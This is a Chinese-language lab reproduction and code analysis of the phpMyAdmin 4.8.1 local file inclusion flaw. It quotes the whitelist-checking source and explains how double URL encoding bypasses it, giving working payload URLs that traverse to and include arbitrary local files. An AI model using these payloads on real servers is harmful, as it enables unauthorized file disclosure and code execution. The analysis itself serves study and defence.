在Windows下使用phpstudy搭建
apache版本:2.4.39
php版本:5.6.9
mysql版本:5.7.26
phpmyadmin 4.8.1下载:https://www.exploit-db.com/exploits/50457
使用composer进行安装
首先在phpmyadmin根目录上一级创建phpinfo.php
然后登陆phpmyadmin,访问/index.php?target=db_sql.php%253f%2F..%2F..%2Fphpinfo.php
查看根目录下,index.php中target参数相关代码
/* * Black list of all scripts to which front-end must submit data. * Such scripts must not be loaded on home page. * */ $target_blacklist = array ( //黑名单 'import.php', 'export.php' ); // If we have a valid target, let's load that script instead if (! empty($_REQUEST['target']) && is_string($_REQUEST['target']) //需要是字符串 && ! preg_match('/^index/', $_REQUEST['target']) //不能以index开头 && ! in_array($_REQUEST['target'], $target_blacklist) //黑名单 && Core::checkPageValidity($_REQUEST['target']) //白名单过滤,函数见下文 ) { include $_REQUEST['target']; exit; }
Core::checkPageValidity方法位于libraries/classes/Core.php中443行,此函数作用为判断?前面的内容是否在白名单中,是则返回true。但是函数并没有对输入的参数做修改,截取的结果都保存在$_page中,所以target只需前面为白名单&%3F
或者白名单%253F
就可以绕过Core::checkPageValidity方法的白名单检测。
/** * boolean phpMyAdmin.Core::checkPageValidity(string &$page, array $whitelist) * * checks given $page against given $whitelist and returns true if valid * it optionally ignores query parameters in $page (script.php?ignored) * * @param string &$page page to check * @param array $whitelist whitelist to check page against * * @return boolean whether $page is valid or not (in $whitelist or not) */ public static function checkPageValidity(&$page, array $whitelist = []) { if (empty($whitelist)) { //没有传入$whitelist $whitelist = self::$goto_whitelist; //$goto_whitelist见下文 } if (! isset($page) || !is_string($page)) { return false; } if (in_array($page, $whitelist)) { //判断是否在白名单 return true; } $_page = mb_substr( //截取?前面的内容 $page, 0, mb_strpos($page . '?', '?') ); if (in_array($_page, $whitelist)) { //判断是否在白名单 return true; } $_page = urldecode($page); //url解码 $_page = mb_substr( //截取?前面的内容 $_page, 0, mb_strpos($_page . '?', '?') ); if (in_array($_page, $whitelist)) { //判断是否在白名单 return true; } return false; }
/** * the whitelist for goto parameter * @static array $goto_whitelist */ public static $goto_whitelist = array( 'db_datadict.php', 'db_sql.php', 'db_events.php', 'db_export.php', 'db_importdocsql.php', 'db_multi_table_query.php', 'db_structure.php', 'db_import.php', 'db_operations.php', 'db_search.php', 'db_routines.php', 'export.php', 'import.php', 'index.php', 'pdf_pages.php', 'pdf_schema.php', 'server_binlog.php', 'server_collations.php', 'server_databases.php', 'server_engines.php', 'server_export.php', 'server_import.php', 'server_privileges.php', 'server_sql.php', 'server_status.php', 'server_status_advisor.php', 'server_status_monitor.php', 'server_status_queries.php', 'server_status_variables.php', 'server_variables.php', 'sql.php', 'tbl_addfield.php', 'tbl_change.php', 'tbl_create.php', 'tbl_import.php', 'tbl_indexes.php', 'tbl_sql.php', 'tbl_export.php', 'tbl_operations.php', 'tbl_structure.php', 'tbl_relation.php', 'tbl_replace.php', 'tbl_row_action.php', 'tbl_select.php', 'tbl_zoom_select.php', 'transformation_overview.php', 'transformation_wrapper.php', 'user_password.php', );
从整体分析来看,target参数传入后,只对其做了黑白名单判断,并没有修改target的值,通过判断后直接传入include()中进行文件包含。在Core::checkPageValidity方法中,直接导致文件包含漏洞的原因是,使用了一次urldecode进行裁剪判断。虽然直接传入/index.php?target=db_sql.php%3F/../../phpinfo.php
也可以绕过Core::checkPageValidity的检测,但是当到了include中,就变成了include('db_sql.php?/../../phpinfo.php')
,此时db_sql.php?/
不会作为目录解析,include会返回错误。
但是由于Core::checkPageValidity中使用了urldecode进行检测,便可以使用双重url编码,传入/index.php?target=db_sql.php%253F/../../phpinfo.php
,到include时,就变成了include('db_sql.php%3F/../../phpinfo.php')
,db_sql.php%3F/
作为目录解析,所以可以成功实现本地任意文件包含。